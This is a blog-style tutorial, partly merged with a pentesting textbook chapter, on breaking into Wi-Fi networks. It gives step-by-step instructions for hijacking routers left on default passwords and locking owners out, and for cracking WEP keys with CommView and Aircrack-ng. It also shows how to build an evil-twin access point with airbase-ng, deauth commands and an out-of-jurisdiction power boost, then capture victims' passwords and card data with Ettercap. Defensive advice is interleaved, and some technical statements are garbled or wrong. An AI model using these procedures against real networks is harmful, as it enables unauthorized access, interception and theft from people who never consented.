Hacking for Free Internet (Wi-Fi)
One of the most common targets of criminal hackers is internet connections (wi-fi). When you think about it, free internet access allows criminal hackers to not only get free bandwidth but to also conceal their location and identity.
What happens when your internet connection gets hacked? Your connection not only slows down, but your identity and location also get used for any illegal activity that a criminal hacker may do using your network.
At the same time, it also becomes very possible for a criminal hacker to get deeper access to your personal computer, thanks to discovered vulnerable ports and shared network devices such as printers. If your mobile phone is also synced to your computer, there is a risk that a criminal hacker would also get access to that device.
For this reason, it is very important to know how your internet connection can be hacked. In this blog, you will learn how most criminal hackers opt to crack your Internet connection through the most popular hack tools.
Check for Unchanged Router Passwords
This is probably the easiest way to hack Internet connection. All you need to do is to see all the available networks that you can connect to. To do that, switch on your computer’s WiFi and look at the list of available networks in your vicinity.
Now, you would see that there are common router names in the list of available networks, such as Linksys.
There is a big chance that the default password for these routers is unchanged, so all you need to do is to log in the manufacturer’s given password.
How do you do that? You just need to go to the manufacturer’s website and look up for the router’s manual.
If you are able to go into the target network using the default password, pull up a fresh browser and log in into the GUI of the target router. If your target is a Linksys router, the IP address to show its GUI is 192.168.1.1.
Once you are prompted for login credentials, leave the username blank, and type in “admin” for a password. (Note: Some routers have different default login credentials depending on the model. You can check for these on the manufacturer’s website.)
Once you are in the GUI, you can change the SSID, the router password, and the security protocol of your target router. This way, you would be able to take full control of the router and prevent the network owner from connecting to his own ISP!
This method assumes that there are just too many Internet users that are not too careful when it comes to securing their Internet connection before putting it to use.
You would be surprised that there are people who do not even bother changing the SSID of their Wi-Fi, which is almost a giveaway that it is not secured by a password other than what the manufacturer uses.
Hack Internet Password
What would hackers do when the Wi-Fi that they are trying to hack is secured? The next thing that they would do is to check how possible it is to guess what the password of their targeted network is.
At this point, you would need to learn a few key terms when it comes to identifying and assigning security to Wi-Fi connections:
1.WEP – means Wired Equivalent Privacy. This is the most basic form of Internet encryption, thus an unsafe option for most Internet users when it comes to assigning security to their wireless connection.
This type of encryption can be cracked with ease using the most basic hacking tools. Older models of Wi-Fi still use this type of encryption.
2.WPA – means Wi-Fi Protected Access. This is a more secure option for newer computer and router models, which can only be efficiently cracked through the old-fashioned trial-and-error method of guessing a potential letter or word combinations (also known as dictionary attacks).
If a strong password combination is used, a WPA connection may almost be impossible to crack. Another variation of this security protocol is the WPA-2, which is tougher to penetrate.
At this point, you have the idea that most hackers would opt to hack available networks that are protected through WEP protocol since it is faster and much easier to crack. Here is a list of tools that a hacker needs in order to crack a WEP-protected Internet connection:
1.A wireless adapter – you would need to have a wireless adapter that is compatible with a software called CommView. This software allows your wireless card to enter monitor mode.
To see if your wireless card is compatible with CommView, you can head over at Wired and Wireless Network Analysis Software by TamoSoft and see if your adapter is on the list.
2.CommView – CommView for Wifi is a software that is used to capture packets from your target network. All you need to do is install this software and then follow the installation guide to install its drivers for your wireless card.
3.Aircrack-ng GUI – this software enables you to crack the password of your target network after you are done capturing packets.
Follow the steps below to start cracking a WEP-encrypted network:
1.Run CommView for Wifi to start scanning for wireless networks according to the channel. Leave it running for a few minutes. You would then see a long list of networks that your wireless adapter can reach.
2. Choose a WEP network (you would see this right next to the name of networks on the list.) Select a network that has the lowest decibel (dB) rating and has the highest signal.
3. Once you have chosen your target, right-click it to open a context menu. Click on Copy MAC Address.
4. Head over to the Rules tab on the menu bar and select MAC Addresses. Tick on the MAC Address rules.
5. For the Action option, choose CAPTURE. Afterward, head over to the Add Record option and choose BOTH.
6. Once you are done formatting the rules, paste the mac addresses that you copied on your clipboard to the box that you would find below it.
7. When capturing packets, remember that you would only need to capture the ones that you would be used for cracking. To make sure that you only capture the packets that you need, select option D (which you would find on the bar right above the window) and deselect Management Packets and Control Packets.
8. Make sure that you save the packets that you have captured so that you can crack them for later. Go to the Logging tab on the menu bar and enable Auto Saving. Afterward, set the Average Log File Size to 20 and the Maximum Directory Size to 2000.
9. Now, wait until you capture enough data packets. Make sure that you wait until you have at least 100,000 data packets so you can get a decent signal for cracking.
10.After collecting enough data packets, head over to the Log tab and select all the logs that have been saved during capture. Head over to the folder where your saved logs are stored.
Click on File, and then Export, and select Wireshark tcpdump format to save it as a .cap file. Choose any destination that you would easily access later on. Do not close CommView.
11. Now, you are ready to crack. Run the Aircrack-ng GUI and choose the WEP option. You would be prompted to open the .cap file that you have exported a while ago. Once you retrieve that file, select Launch.
12. Once your Aircrack-ng GUI is running and decrypting the data packets that you had on your log, open the command prompt. Type in the index number of the network that you have selected a while ago.
13. Wait until the wireless key appears.
If everything goes well, you would easily get the wireless key of your targeted network. If you missed some packets, you would be prompted by Aircrack-ng that you need to capture more of them. If that happens, you just need to wait for CommView to get the additional packets that you need.
Can Tougher Security Measures be Breached?
At this point, you would realize that it is fairly easy for most hackers to gain access to the type of Internet security that you are using.
At the same time, you should also have the idea that once criminal hackers know what type of encryption you are using, the easier it is for them to identify the tools that they should use for hacking your network.
Is it possible for hackers to breach more advanced protocols such as WPA and WPA2?
Yes, they could accomplish such a feat, but it would take them more time – making the process inefficient, especially given that their goal for hacking network connections is to enjoy better bandwidth and have immediate internet access or even to mask their location.
For this reason, it would be best to enable WPA (or other better encryption options) should your devices allow it.
Now that you have a general idea on how hackers can steal your Wi-Fi, it is time to take some preventive measures. The next blog will tell you more about that.
Securing Your Network
It is possible for Internet connections to get stolen, but there are many ways to dissuade hackers from getting their hands on your bandwidth. If you think that someone is leeching on your Wi-Fi, it pays to check the users that are connected to your network.
Tell-Tale Signs of Breach
You can almost be certain that an unauthorized user is connected to your network if you experience the following:
1. You are experiencing intermittent Internet connection
If you are sure that you usually have a high-speed Internet connection and that you normally do not have problems when streaming or viewing pages, it is very possible that an extra user is logged in to your Wi-Fi.
2. You see changes in your Public folder
If you are the sole user of Internet in your household, or that you are very certain of what the contents of your network’s shared folders are, then there should be no reason for you to see any new or altered files on your Public folders.
The best way to check that is to pull down the context menu of any suspected files and see when they were last accessed or modified. If you do not remember accessing them on the displayed date and time, then somebody else is accessing them without your knowledge.
3.Your shared devices are behaving strangely
If your printer and other gadgets that can be accessed through the network are behaving strangely, or there are unknown devices that are suddenly included in your network, then somebody else must be using your network for remote access.
4. Your router’s lights keep on blinking even when you are offline
One of the low-tech ways to see whether there is an unauthorized Wi-Fi user on your network is to disable the connection on all your wireless devices. If your router’s wireless lights are blinking, then there is another user that is making use of your internet connection.
5. You have an unidentified user on your network’s console
You can see all the devices and their corresponding MAC addresses on your network’s admin console. All you need to do is to enter your router’s assigned IP address on your browser, enter your login credentials, and then check all the attached devices.
If there is an unrecognizable device on that list, then you are definitely certain that someone is snooping around on your wireless connection.
Beef Up Your Security and Auditing Measures
If you confirmed your suspicion that there is someone leeching on your Internet connection, the best way to prevent them from getting access is to change your router’s password and SSID immediately.
This way, the unauthorized user would be immediately kicked out of your network. To take things further, you may also opt to disable SSID broadcast so that your Internet connection would not be detected as an available network anymore.
However, this solution may be temporary if you are against a sophisticated hacker. Keep in mind that it is possible for some hackers to mask their MAC address through MAC spoofing, which means that their device may not appear on the list of attached devices when you check your router’s GUI.
When this happens, you may want to use more sophisticated tools for auditing connected devices on your network to check for any sleuthing activities. Here are some tools that you can use to make sure that you identify all unauthorized users on your network and prevent them from connecting to your router once and for all:
GlassWire serves as both a security system and a firewall. If you subscribe to the Pro version, you would gain access to the Network view that would enable you to see all the devices connected to your network.
You can also get a full report on how your bandwidth is being used, which includes a detailed graph of what running applications are using up bandwidth.
It would also alert you whenever there is an application that is trying to apply changes on your computer, or when an installer is trying to add a driver to your system.
What makes it a good security feature to your computer is that it would always alert you when there is a new device that connects to your wireless connection. If you are running a network of computers, this feature would be a most welcome addition to your security protocol.
2.Wireless Network Watcher by Nirsoft
This software is a clean program that works without any nag popup screen or adware, and for those who are trying to save up space, this tool does not even need to be installed.
All you need to do is to download the tool and launch it, and then it would start displaying all devices, MAC addresses, and Wi-Fi network hardware of all connected devices. This tool even allows you to identify devices that do not come with a specific device name, like Android devices.
This free wireless auditing tool is among the favorites of law enforcement organizations since it can tell you the location of any wireless hacker based on the information that they send across the network. It is fairly accurate in pinpointing locations up to two meters.
It does not run as an executable Windows file, so you would need to burn this file into a bootable CD. To use this program effectively, you would want to use a wireless card with a directional antenna, and then walk around with your laptop to triangulate and pinpoint the physical location of a wireless hacker.
Dealing with Fake Wi-Fis
If you are on the go and you need to send a quick email, it would be fairly tempting to log-in to any available wireless network that seems to be unprotected by a password. Now, wouldn’t you think that it is just too convenient that an unprotected WLAN is available?
Hackers have what it takes for people to take the bait of a free Wi-Fi – it is because people do not think twice before connecting to an available hotspot in a public place.
Because hackers know that most people are not thinking about their devices’ safety when there is free internet access on the line, they are confident that people would fall for their trap.
Fake Wireless Access Point Theft
This hacking technique, also known as the evil twin access point, is mostly done in public areas, wherein a hacker would mask an access point as free internet connection and prompt people to connect to it. Once a victim connects to the fake wireless connection, they would be able to collect sensitive data from the connected device.
Usually, hackers who use this technique prompt the user to log in using any sensitive information (such as credit card information) in exchange for free access.
While the hacker stores this information for future use, he would redirect the targeted user to other sites that people commonly visit, such as a web browser, email landing page, or even social media sites.
From here on, the hacker would collect password information. Hackers then use the collected data to log in to other sites, assuming that their victims are using the same passwords for multiple sites.
Apart from knowing just the password of a targeted Internet user, an evil twin access point also allows you to see the traffic that comes in and out of a connected device. That means that creating an evil twin access point also allows you to view all the activities of a potential target.
The biggest telltale sign that you have been a victim of this type of hack is when you receive notices from your credit card company about charges that you did not make or that your social media account has been taken over.
However, if you think that you have connected to an evil twin access point, there is no telling what kind of information about your computer usage, or your files, have already been shared to thousands of hacker forums.
How an Evil Twin Access Point is Made
Creating a fake wireless access point would need almost the same tools that you use in hacking a Wi-Fi, which is the wireless card and the aircrack-ng suite.
This suite has a tool called airbase-ng, which can convert your wireless card into an access point. This tool would allow you to see all the traffic coming from a connected device and also enable you to make a man-in-the-middle attack.
The following hack would enable you to clone an existing access point (or your neighbor’s internet connection) and fool a target into connecting to a fake access point.
The objective of this hack is for you to know how a criminal hacker would be able to easily select a target within range, bump him off his own connection, and then force him into connecting to a false duplicate of his WLAN connection.
This would show you how any hacker would be able to monitor his target’s traffic, and also obtain sensitive information.
Here are the steps that you need to take in order to create an evil twin access point:
1. Start Airmon-Ng and check your wireless card. Run the following command: bt > iwconfig.
After doing so, you would be able to see that your wireless card is operational. It would most probably be assigned as wlan0 once it is up and running.
2. Once your wireless card is set, run it into monitor mode.
To do this, simply enter: bt >airmon-ng start wlan0
3. By running the previous command, you would be able to see all the wireless traffic that your wireless card can monitor with its antenna. That means that you would be able to see all the SSIDs of access points that the people around you are connecting to.
Now, you would need to capture this traffic. To do this, enter: bt > airodump-ng mon0
4. In order for you to dupe people into connecting to a fake wireless connection, you would need to clone an existing access point and convert it into an evil twin. Doing so would also allow you to insert your own packets or pieces of data into a target’s computer.
5. Now, all you need to do is to wait for your target computer to connect to his internet connection. When that happens, it would appear on the lower part of the screen.
6. Once your target has connected to his own access point, you would need to create a new access point using the same SSID and MAC Address of his WLAN.
The MAC Address would appear as the BSSID in the list of access points that your wireless card was able to detect during monitor mode. You would also need the channel where your target’s signal is.
Once, you have the information that you need, pull up a new terminal and enter the following command:
bt > airbase-ng -a (BSSID) —essid “(name of the access point)” -c (channel) mon0
7.Now, you would need to take your target off his access point and force him to automatically reconnect to the fake access point that you have created in the previous step.
To do this, you would need to insert a deuth packet using the following command: bt > airplay-ng —deauth 0 -a (BSSID of target)
8. Here is one crucial aspect that hackers are aware of when they are creating an evil twin: the fake access point that you have should be close to the strength or stronger than the signal of the target’s true access point. If you are in a public place, this should not be a problem.
However, if you are targeting devices that are far from you, you would need to turn up your fake access point’s power.
To boost your access point’s signal to its maximum,key in the following command: iwconfig wlan0 txpower 27
Typing in this command would allow you to boost your access point’s output to the maximum allowable power in the United States, which is 500 milliwatts or 27dBm. If your target is too far, you may need to boost your access point’s power up to what your wireless card would allow you to.
Every country has Wi-Fi regulations, and the maximum allowable power for access points in another country may be illegal in yours.
Make sure that when you do the following hack, you would are backed by your company and that you have assumed written prior consent by your practice target to avoid any legal repercussions of the next steps.
If you want to use another country’s maximum regulated power to boost your access point a little further (Bolivia has more available channels and can allow you to boost up to 1000 mW), you can use the following command to switch regulations: iw reg set BO
Once you are in this country’s regulatory domain, you can boost your wireless card to the maximum by typing the following command:iwconfig wlan0 txpower 30
To check for the output power, type: iwconfig
Now, you are guaranteed that all device users that are looking at available networks around you are seeing your access point in its full signal. If you boosted the signal to 30dBm or 1000mWs, your fake access point would possibly be seen even from a few blocks away.
By boosting the signal, hackers are able to create the impression that their fake network is legitimate.
However, there is something you should keep in mind as you boost your wireless equipment’s power – overheating becomes a much greater risk as you move towards the higher output. So, it is recommended to at least consider lowering the device’s temperature, which is usually done by increasing airflow.
9. Now that you have successfully created a fake access point, the next step is to monitor the activity of your targets. You can use the software called Ettercap to start creating man-in-the-middle activities, which means that you can set up shop in this connection by intercepting, injecting traffic, or analyzing all the data that comes and goes into a target device.
Through this activity, you would be able to intercept all possible sensitive information that he may unknowingly pass through the evil twin network, such as passwords, credit card information, downloads, and uploads.
Now that you know how most hackers can set up shop in your devices by duping you into connecting to a fake access point, it’s time to take preventive measures. Here are some ways on how you can prevent attacks like this:
1. Ask for legitimate Wi-Fi service
The best defense against evil twin attacks is to verify what network you are connecting to before you connect. If you are in a public space, such as a café, make sure that you ask for the shop’s SSID and password. If you think that free Wi-Fi is too good to be true, it most probably is.
2. Always use different log-ins.
If there is no choice but to log in to a free public Wi-Fi, then make sure that you are using a different username and password to prevent giving everyone listening to the network a free pass to your most sensitive accounts.
3. Use a Virtual Private Network (VPN)
A VPN masks your device’s physical location by assigning you a different IP address and even a MAC Address.
It would also encrypt the data that you are sending out, which means that all the information that you are using to fill out any form on an evil twin network would not be deciphered by any hacker that would be listening on the other end.
VPNs are also great when it comes to detecting any evil twin network – if a free hotspot is prompting you to disconnect your VPN before you continue, then you know that the hackers on the other end are forcing you to disable any encryption that they can’t read through so that they can steal your data.
4. Be extra cautious when your devices suddenly disconnect from your secured internet, especially when all other devices that are connected to the network are also bumped off. It is very possible that a death packet has just been inserted into your access point, forcing every device connected to it to disconnect.
When this happens, turn off the auto connect feature of your devices to prevent them from connecting to a potential evil twin access point.
5. If you are in an unfamiliar public area, turn off the auto connect to the hotspot feature of your devices.
6. Pay attention to any pop-ups and dialog boxes that tell you that there is another device that connected to your network.
7. Pay extra attention to the URL of the pages that you are connecting to. Most companies do advertise unencrypted versions of their websites, simply because HTTP is easier to remember than https.
Always remember that the added “s” means that you are visiting a secure site. Also, make sure that there is a lock icon on the browser when you are entering sensitive information.
Detecting and Targeting Wireless
In addition to standard wired networks, you will encounter a myriad of wireless networks and devices during your investigations. As such, you must have a strong knowledge of what they are, how they work with them, and how to potentially strike at them during your pentest.
Wireless technology extends a company’s network into areas that wired networks cannot go (or go easily). Reception for wireless networks can now easily extend into nontraditional areas such as coffee shops, hotels, libraries, public parks, lobbies, shopping malls, and restaurants, to name a few.
This greater range, as well as issues such as access, ease of setup, and unique security and setup requirements, has made wireless a prime target for attacks.
In this section, you’ll learn to:
Break wireless encryption technologies Conduct a wardriving attack
Break the Internet of Things
An Introduction to Wireless
Wireless (Wi-Fi) collectively refers to the group of technologies covered by different frequencies and capabilities of wireless networks.
Nowadays nearly every gadget, device, and household appliance contain wireless technology. Wireless may be the only networking technology you find on your new gadget or device, with wired networking optional in many systems.
With all the convenience that the technology offers, the risks have increased, in some cases dramatically, compared to traditional wired networks.
Attacking parties have found wireless networks to be much easier to target and penetrate than wired networks, and many companies have slowed their implementation or needlessly exposed themselves to security risks.
Of course, there are drawbacks to every technology:
The range of wireless networks is not as good as that attained by traditional wired networks.
Interference is common on wireless networks due to the presence of other wireless devices and environmental factors. Interference means lower performance, dropped connections, reduced distance, and other issues. Performance and distance of wireless networks are never what is promised on the device itself and is usually around half of the numbers specified.
Security is a concern on wireless networks because the signal covers a much broader area than a traditional wired network can. Wireless-enabled devices are the norm and users of these devices tend to always look for open access points, in many cases not giving much care to whether or not they are secure.
Geographic and environmental conditions can have a tremendous impact on the range and speed of a network. Changes in air density, trees, walls, temperature, and other conditions will affect wireless networks.
There are many advantages that make wireless a great target of opportunity:
Can go places where wires would be impossible to place and thus easier to access
Available in many places where wired networks do not exist or can’t exist
Extremely common technology
A wireless network relies on radio frequency (RF) to send and receive information, so understanding RF will assist you in working with these networks. Much like Ethernet networks, Wi-Fi networks are concerned with what happens at the physical layer of networking.
The physical layer defines how stations will connect, transmit, receive, and format signals for use on a network, which, in this case, is wireless.
Recognizing the Components of a Wireless Network
Wireless technology has a special language and set of terminology. Though you may not hear all the terms all the time, familiarity with them is important, so I will introduce you to each and their respective function or place.
Service Set Identifier (SSID) This is the name that is broadcast by a wireless access point that identifies itself to potential clients.
You have already seen an SSID appear in your favorite wireless client as the text string that appears in the list of available wireless networks. The name can be made up of a combination of letters and numbers.
An SSID is used to identify a wireless network to clients. However, wireless networks can have their SSID either visible or hidden depending on the situation. On open networks, the SSID is visible and can be viewed by any client searching for it. On closed networks, the SSID is not visible and in some cases is said to be cloaked.
Association When a wireless access point and a wireless client connect while getting ready to exchange information, it is called an association.
Hotspot This is any location that provides wireless access to an area such as a coffee shop, airport, library, lobby, or similar location.
Access Point This is a hardware device or software application that allows a wireless network to be established. Clients connect to the access point for network services.
When working with the standard access points sold in consumer electronic stores, changing the antenna is not an option. However, where a large and more powerful enterprise access point is involved, the selection of an antenna is much more important.
Let’s take a look at the different types of antennas that you may encounter and what each may mean to you as a security person.
Wi-Fi Authentication Modes
Clients associating with an access point must not only be in range and speaking the language, but they must also perform some sort of authentication. There are two major types:
Open System Authentication (OSA) is used in situations where the access point can be attached to by any client. This type of authentication occurs when an authentication frame is sent from a client to an access point (AP).
When the AP receives the frame it verifies its SSID, and if correct the AP sends a verification frame back to the client, completing the connection sequence.
It is important to remember that just because this process has completed successfully it does not in any way mean that the client will be able to access the network resources. All that has happened is that the client can attach to the access point.
Shared Key Shared key authentication is different from OSA. A client receives a key ahead of time, which allows them to attach to the network.
In a few steps, this is how shared key authentication works:
1. The client sends an authentication request to the access point.
2. The access point returns a challenge to the client.
3. The client encrypts the challenge using the shared key it is configured with.
4. The access point uses the same shared key to decrypt the challenge; if the responses match, then the client is validated and is given access to the network.
Breaking Wireless Encryption Technologies
One of the things that have made wireless networks less than attractive to companies traditionally is their perceived lack of or weak security. Since wireless networks transmit their signals over the air, the information is more vulnerable than it would be on a wired network.
Without adequate protection, the information can be easily sniffed and even captured by a third party. To reduce this problem, encryption is commonly implemented to make the likelihood of interception lower.
The three most common technologies used to protect wireless networks are as follows:
Wired Equivalent Privacy (WEP) The oldest and the weakest of the technologies, the WEP standard was introduced as the initial attempt to provide wireless security but was found to be flawed and highly vulnerable not long after it debuted.
Wi-Fi Protected Access (WPA) The primary successor to WEP, WPA, was intended to address many of the problems that plagued WEP. Though it succeeded in addressing many of the problems and is a much stronger system, it still has some vulnerabilities. WPA uses TKIP and AES encryption as its main mechanism for securing information.
WPA2 This successor to WPA was intended to address and replace the problems with WPA. WPA2 is much stronger, and uses tougher encryption in the form of AES and CCMP. The standard also comes in a version that uses stronger systems such as EAP and TKIP. WPA2 also has a Personal as well as an Enterprise method for deployment.
With all the alphabet soup revolving around security protocols, which is the best to use? Which is the most vulnerable? Which is the strongest? Let’s take a look to see what is what with security and wireless.
When wireless networks were first introduced to the public, the need for security was readily obvious and the creators of wireless introduced WEP to provide this ability. WEP is the oldest of the security protocols available for wireless networks and also happens to be the most vulnerable.
When originally introduced with the 802.11b standard, WEP was intended to make wireless networks as secure as wired networks. However, this proved not to be the case as the technology was not up to par.
On the surface, WEP looks like a good technology with its use of well-known and well-regarded cryptographic protocols such as RC4, but in actuality, the implementation was extremely poor.
It is now known that technology is weak at best. WEP was created with good intentions, but when created it was very weak in practice. The reason for this was the simple fact that WEP was created by people not familiar with cryptography who did not enlist the aid of those who were.
So the use of good technologies and techniques such as RC4 that were used during WEP’s creation were not used in an effective way.
WEP was intended to provide the following:
Defeat eavesdropping on communications and attempts to reduce unauthorized disclosure of data
Check the integrity of data as it flows across the network
Use a shared secret key to encrypt packets prior to transmission
Provide confidentiality, access control, and integrity in a lightweight, efficient system
Its problems arise from the following circumstances:
The protocol was designed without input from the academic community.
It provides no mechanism for key distribution and instead relies on preshared keys. This leads to many users never changing their keys due to the amount of work involved.
An attacker gaining enough ciphertext and plaintext can analyze and uncover the key from intercepted network traffic. Undoubtedly, you have heard a lot about how poor the WEP protocol is and how it should not be used. What we are going to explore is how WEP is broken so you can see the process and how everything pulls together.
To perform this process from end to end, including the process of cracking the keys, follow these steps:
1. Start the wireless interface on the attacking system in monitor mode on the specific access point channel. This mode is used to observe packets in the air, but it does not connect to an access point.
2. Probe the target network with the wireless device to determine if packet injection can be performed.
3. Select a tool such as aireplayng to perform a fake authentication with the access point.
4. Start the Wi-Fi sniffing tool to capture Initialization Vectors (IV). If using aireplayng, ARP request packets can be intercepted and reinjected back into the network, causing more packets to be generated and then captured.
5. Run a tool such as Cain & Abel or air racing to extract the encryption keys from the traffic
Moving from WEP to WPA
After WEP was found to be terribly flawed and irreparably broken, Wi-Fi Protected Access (WPA) was introduced. WPA was designed to be a software upgrade instead of requiring a full hardware upgrade, making implementation easy via service packs or software updates.
The most significant development that was introduced with the WPA protocol was the TKIP system to improve data encryption. TKIP is a protocol used to dynamically change keys on a regular basis; WEP, in contrast, uses the same key until it is physically changed. This dynamic changing of keys makes WPA much more difficult to crack than WEP.
WPA does suffer from the following flaws:
Weak keys are chosen by the user Packet spoofing
Cracking WPA and WPA2
To crack WPA, a different approach must be used than with WEP. Fortunately, one of the best tools available for thwarting WPA is freely available in Kali Linux in the form of Reaver. Reaver exploits holes in wireless routers in an attempt to retrieve information about the WPA preshared key that is used to access the network.
WPA2 is an upgrade to WPA, which was introduced to fix the defects that were part of the original. WPA2 offers much-improved security over its predecessor and retains compatibility with 802.11i standards for security.
WPA and WPA2 both suffer from vulnerabilities that can be exploited by you, the pentester. Each offers a way to penetrate the security of an otherwise strong protocol.
So, how can you attack WPA and WPA2?
Offline Attack This attack functions by being close enough to the access point to observe what is known as a handshake between the client and access point. A handshake is an authentication or association that takes place when an initial connection attempt is made.
Since an initial synchronization or key exchange is made at this point, it is a matter of observing and capturing the process and cracking the keys offline. This attack works because the handshake is in the clear each and every time, making it possible to gain enough information to get the key.
Deauthentication Attack This type of attack approaches the problem of observing the handshake process that takes place between client and AP and inducing them to break their connection and reconnect. Much like the offline attack, the deauthentication attack just has to capture the handshake process and crack the key.
Extracting Keys In situations where preshared keys are entered into each client, it is possible to physically gain access to the client and retrieve the key from there.
Brute-Force WPA Keys The lowest technological attack is to break the keys by using a good old brute force. This attack is typically performed using tools such as aircrack, airplay, or KisMac to brute force the keys.
The downside of this attack is that it can take a long time or a lot of computing power to recover the keys. The attack may also either lock up the access point or set off detection mechanisms.
While carrying out these attacks are possible using Linux-based tools such as Kali Linux or the aircrack-ng suite, other options are available. A company called Pwnie Express has two devices known as the Pwn Pad and the Pwn Phone that make cracking wireless easier than ever before.
Both devices offer a built-in suite of tools used for all sorts of security audits and tests, including tools that can very quickly break WEP, WPA, and WPA2.
Both have the advantage of using off-the-shelf hardware such as the Nexus 5 and Nexus 7, which can make them very easy to hide. They also don’t look overly suspicious when they are observed by a third party. The downside is that they are rather pricey—over a thousand dollars a piece.
Though you can purchase a device such as the Pwn Pad or Pwn Phone, they may not be the best or most cost-effective option. Both the can be homemade just by purchasing the tablet or phone from eBay and using free versions of the OS (called community editions) from Pwnie Express.
You could also build your own device from scratch using the much more popular Kali Linux pentesting OS in the form of Kali NetHunter.
The benefit in this route is that it works on many more devices and is more flexible, much better documented, and highly customizable—as well as being free.
Exploring Wireless Deployment Options
There are numerous ways to deploy a wireless network. As a pentester, you should be aware of these different types since they may be useful to you in planning or carrying out a test. Understanding the various types of network deployments for wireless can greatly assist you when planning your attack.
For example, being able to identify a 4G hotspot may allow you to target a user who is using their phone to establish a wireless connection while attached to a physical network.
In this case, the user may be opening up a backdoor to the main network. Targeting a site-to-site WLAN could effective if you wish to carry out a denial-of-service attack and break connectivity between locations.
One of the common ways to create a wireless network nowadays is through the use of a 3G/4G hotspot. A 3G/4G hotspot is a wireless network that is deployed by using a special cellular-enabled access point or by using a cell phone that can be turned into an access point with a simple “push” of a button.
Encountering these types of devices is common sense just about every smart-phone has this capability as a standard function.
Networks using a cellular access point have another common property: their form factor. Many of the access points that are in this form factor are small and may come in the form of a cell phone or tablet.
These last two illustrate a benefit as well as a security issue with these access points: they don’t look like one and are only part of a very common device. Devices like this can be easily concealed and blend in with the everyday kit someone would carry, thus not raising suspicion.
Extension to an existing network is the type of network deployment that uses access points that are attached to a hardwired network and allow the reach of the existing network to go further. Interestingly enough, the types of access points encountered on this type of network can be hardware or software in nature.
The latter type of access point (the software type) is typically accomplished by sharing a wireless adapter to other devices and thus allowing them to attach to the client.
Multiple access points are another commonly encountered deployment type that uses several access points to cover a large area. Much like cellular networks, this type of deployment requires access points to overlap with each other to some degree, allowing for clients to roam without losing connectivity.
This type of deployment is encountered in locations such as hotels, conference centers, and schools and involves providing more than one access point for clients to attach to as needed.
When this type of implementation is in place, it requires that each access point have some degree of overlap with its neighboring access points. When it has been set up correctly, this type of network allows clients to roam from location to location seamlessly without losing connectivity.
A LAN-to-LAN wireless network allows networks in close but different physical locations to be connected through wireless technology.
This has the advantage of allowing connection between locations that may otherwise have to use a more expensive connectivity solution such as paying to dig up a street to lay a physical cable. This type of deployment is also sometimes referred to as a site-to-site wireless LAN (WLAN).
So how can you thwart many of the attacks that we have discussed here that target WEP and WPA? Well, excluding encryption and other mechanisms, some of the leading techniques include the following and are commonly used by the consumer:
Use a complex password or phrase as the key. Using the same rules you saw earlier for passwords, you can make a strong password for the AP. Use server validation on the client side to allow the client to have a positive ID of the AP they are connecting to.
Eliminate WEP and WPA and move to WPA2 where available. Use encryption standards such as CCMP, AES, and TKIP.
Use MAC filtering on the access point.
Disable the option SSID Broadcast in your router. With an understanding of the various security technologies, you now need to know how networks can be found in the first place.
Conducting a Wardriving Attack
Wardriving is a common means of targeting wireless networks. The attack consists of an attacker driving around an area with a computing or mobile device that has both a wireless card and software designed to detect wireless clients or access points.
In this exercise, you will set up and configure a system to perform a wardriving operation. This exercise provides the general steps and items you will need to perform this operation, but you may need to tailor certain steps for your hardware and setup where noted.
A word of caution: Keep safety and the law in mind when performing this exercise. If you choose to actually drive around using this setup, remember that you should first start the system up and get it scanning while you are stopped. You should place the notebook on the floor of the vehicle in the passenger side or back seat of the car.
Additionally, the notebook screen should never be in view of the driver unless the car is safely stopped or parked; having a computer screen in view of the driver is illegal in most states.
Perform this activity with someone else driving while you test it out. Before you start this exercise, you will need the following:
Software such as Vistumbler, KisMAC Mapping software such as WiGLE
Hardware USB GPS device
Notebooks with a wireless card (Note that the frequencies your wireless card supports will be the only ones you will be able to detect; if this is insufficient for your needs, you will need to get an external USB adapter.)
Here are the steps:
1. Install the software of your choice as defined by your operating system.
2. Register for an account on the WiGLE website in order to upload the data that you have collected regarding access points and locations.
3. Ensure that the drivers for your wireless card or adapter are updated to the latest version.
4. Install your GPS device and load the necessary drivers for your operating system.
5. Start up your software (such as Vistumbler).
6. Configure your software to recognize your GPS (if necessary).
7. Let the system run for a few moments to allow it to detect wireless networks. If successful, proceed to the next step. If not, refer to your software or hardware vendor’s website to troubleshoot and test again.
8. Drive around with the system running for a time, with the software detecting access points.
9. After a period of time, you can save a log of the activity to your hard drive.
10. Once the information is saved, you can upload it to WiGLE, which will plot out the locations on a map.
In this type of attack, wireless detection software will either listen for the beacon of a network or send off a probe request designed to detect the network. Once a network is detected, it can then be singled out for later attack by the intruder.
It is common for site survey tools to also include the ability to connect to a GPS device in order to pinpoint an access point or client within a few feet. There are also variations of the wardriving attack, all of which have the same objective:
Warflying Same as wardriving, but using a small plane or ultralight aircraft War ballooning Same but makes use of a balloon instead
Warwalking Involves putting the detection equipment in a backpack or something similar and walking through buildings and other facilities
Something that works with these techniques is known as warchalking, or the placement of symbols in locations where wireless signals were detected. These symbols tell the informed that a wireless access point is nearby and provide data about it, including open or closed access points, security settings, channel, and name.
Conducting Other Types of Attack
These are other ways to get at a wireless network:
Rogue access points are an effective way of breaching a network by tempting users to connect to the access point. To carry out this attack, the attacking party will set up an access point that is outside of the company’s control.
Once victims attach to the access point, they may start to transmit information (including sensitive company data) over the network, potentially compromising security.
This type of attack is very easy to perform through the use of readily available compact hardware access points as well as software-based access points. In both cases, the access points are easy to hide as well as easy to configure.
MAC spoofing uses MAC filtering to control which clients can or cannot attach to an access point. By using software such as a sniffer, you can view the valid MACs that can attach to an access point and duplicate them accordingly. For those access points that employ MAC filtering, you can use MAC spoofing.
Typically it is possible to use tools such as SMAC or ifconfig to accomplish this task. However, in some cases, the hardware configuration settings for a network card may allow the MAC to be changed without such applications.
Misconfiguration is a common problem—many hardware and software items can be misconfigured. The owner of a device could easily misconfigure a device and reduce or negate the device’s security features.
A wireless access point provides an ideal “access anywhere” solution for attackers or other malicious parties that can’t physically connect to the network.
Client misassociation is a type of attack that starts with a victim attaching to an access point that is on a network other than their own. Because of the way wireless signals propagate through walls and many other structures, a client can easily detect another access point and attach to it either accidentally or intentionally.
In either case, a client may attach to a network that is unsafe, perhaps while still connected to a secure network.
A promiscuous client offers a strong signal intentionally for malicious purposes. Wireless cards often look for a stronger signal to connect to a network. In this way, the promiscuous client grabs the attention of the users by sending a strong signal.
Another potential attack is the process of jamming the RF signal being used by a wireless network. Jammers are available that specifically target wireless networks in both the 5 GHz and 2.4 GHz range.
This action creates an issue with the availability of the network and results in a targeted denial-of-service attack against access points in the area. It is possible to use a specially designed jammer that can transmit signals that can overwhelm and deny the use of the access point by legitimate clients.
